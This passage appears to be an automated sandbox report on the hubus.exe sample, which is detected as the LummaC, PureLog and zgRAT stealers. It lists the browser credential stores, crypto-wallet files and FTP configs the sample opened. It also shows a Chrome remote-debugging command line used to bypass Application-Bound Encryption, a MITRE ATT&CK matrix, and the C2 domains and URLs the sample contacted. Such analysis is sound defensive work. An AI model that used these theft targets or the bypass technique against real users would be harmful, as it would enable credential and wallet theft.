                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\AKJIMDEQMBJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\AKJIMDEQMBJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\AZTRJHKCVRJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\AZTRJHKCVRJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\GNJEVOXLLSJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\GNJEVOXLLSJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\MIVTQDBATGJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\MIVTQDBATGJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\QLSSZNHVJIJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\QLSSZNHVJIJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
                          Source: Yara matchFile source: 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: hubus.exe PID: 4780, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Attempt to bypass Chrome Application-Bound Encryption
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: hubus.exe PID: 4780, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: hubus.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.hubus.exe.a70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Yara detected zgRAT
                          Source: Yara matchFile source: hubus.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.hubus.exe.a70000.0.unpack, type: UNPACKEDPE

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		1
                          Network Service Discovery                          		Remote Services11
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Scheduled Task/Job                          		1
                          Create Account                          		1
                          Extra Window Memory Injection                          		111
                          Deobfuscate/Decode Files or Information                          		LSASS Memory1
                          File and Directory Discovery                          		Remote Desktop Protocol41
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          PowerShell                          		1
                          Scheduled Task/Job                          		11
                          Process Injection                          		4
                          Obfuscated Files or Information                          		Security Account Manager23
                          System Information Discovery                          		SMB/Windows Admin Shares2
                          Clipboard Data                          		1
                          Remote Access Software                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          Scheduled Task/Job                          		12
                          Software Packing                          		NTDS221
                          Security Software Discovery                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets12
                          Virtualization/Sandbox Evasion                          		SSHKeylogging14
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Extra Window Memory Injection                          		Cached Domain Credentials2
                          Process Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                          Virtualization/Sandbox Evasion                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                          Process Injection                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578636 Sample: hubus.dll Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 26 testyhurriedo.click 2->26 28 klipcatepiu0.shop 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 10 other signatures 2->42 9 hubus.exe 2 2->9         started        signatures3 process4 signatures5 44 Attempt to bypass Chrome Application-Bound Encryption 9->44 46 Found many strings related to Crypto-Wallets (likely being stolen) 9->46 48 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->48 50 LummaC encrypted strings found 9->50 12 hubus.exe 9->12         started        process6 dnsIp7 32 testyhurriedo.click 104.21.112.1, 443, 49744, 49745 CLOUDFLARENETUS United States 12->32 34 127.0.0.1 unknown unknown 12->34 52 Query firmware table information (likely to detect VMs) 12->52 54 Found many strings related to Crypto-Wallets (likely being stolen) 12->54 56 Tries to harvest and steal ftp login credentials 12->56 58 2 other signatures 12->58 16 chrome.exe 12->16         started        signatures8 process9 dnsIp10 22 192.168.11.20, 137, 1900, 443 unknown unknown 16->22 24 239.255.255.250, 1900 unknown Reserved 16->24 19 chrome.exe 16->19         started        process11 dnsIp12 30 www.google.com 172.253.124.104, 443, 49749, 49750 GOOGLEUS United States 19->30

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          hubus.exe37%ReversingLabs
                          hubus.exe100%AviraHEUR/AGEN.1323360
                          hubus.exe100%Joe Sandbox ML

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          www.google.com
                          		172.253.124.104
                          		truefalse
                            		high
                            testyhurriedo.click
                            		104.21.112.1
                            		truetrue
                              		unknown
                              klipcatepiu0.shop
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://testyhurriedo.click/apitrue
                                  		unknown
                                  grannyejh.lattrue
                                    		unknown
                                    https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26oft%3D1%26pgcl%3D20%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgRmgZjNGKXmkrsGIjAb7Fn47Pfqq66K6PhdOlnUxTi9zJAMw9w-80fWZCRZxaXkInduKUM2DaaOHZpbOAUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                      		high
                                      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGKXmkrsGIjCkGpzj8-euKlDOVcJu_WqTG7Pj74bgPdYXXG0950A2yNMi702qgLvpvTQOXXmXdkwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                        		high
                                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                          		high
                                          testyhurriedo.clicktrue
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://klipcatepiu0.shop/int_clp_ldr_sha.txthubus.exe, 00000001.00000002.12268716447.000000000156A000.00000004.00000020.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12270439971.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://testyhurriedo.click/shubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000002.00000002.12191689804.00002D2402A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_chrome.exe, 00000002.00000002.12186392208.00002D2402230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEchrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://shop.advanceautoparts.com/web/OrderItemDisplaychrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://dns-tunnel-check.googlezip.net/connectchrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://polymer.github.io/AUTHORS.txtchrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119832619.00002D24037B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120319474.00002D2403844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120050820.00002D2402740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119929342.00002D2403818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.zappos.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.guitarcenter.com/cartchrome.exe, 00000002.00000002.12191138758.00002D2402A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://unisolated.invalid/chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://setup.office.comchrome.exe, 00000002.00000003.12142740466.00002D2403A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142698855.00002D2403A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195303310.00002D2403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196171828.00002D2403258000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.altardstate.com/cart/chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.adorama.com/als.mvc/cartviewchrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)chrome.exe, 00000002.00000002.12186986657.00002D24022DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.bestbuy.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://stackoverflow.com/q/14436606/23354hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.williams-sonoma.com/shoppingcart/chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://crbug.com/593024chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://polymer.github.io/PATENTS.txtchrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119832619.00002D24037B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120319474.00002D2403844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120050820.00002D2402740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119929342.00002D2403818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://www.youtube.com/s/notifications/manifest/cr_install.html7chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/search?q=autoitchrome.exe, 00000002.00000002.12186331740.00002D2402220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196931582.00002D2403374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://shinobi.jpchrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.ae.com/us/en/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplaychrome.exe, 00000002.00000002.12189891160.00002D24027A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.ecosia.org/newtab/chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
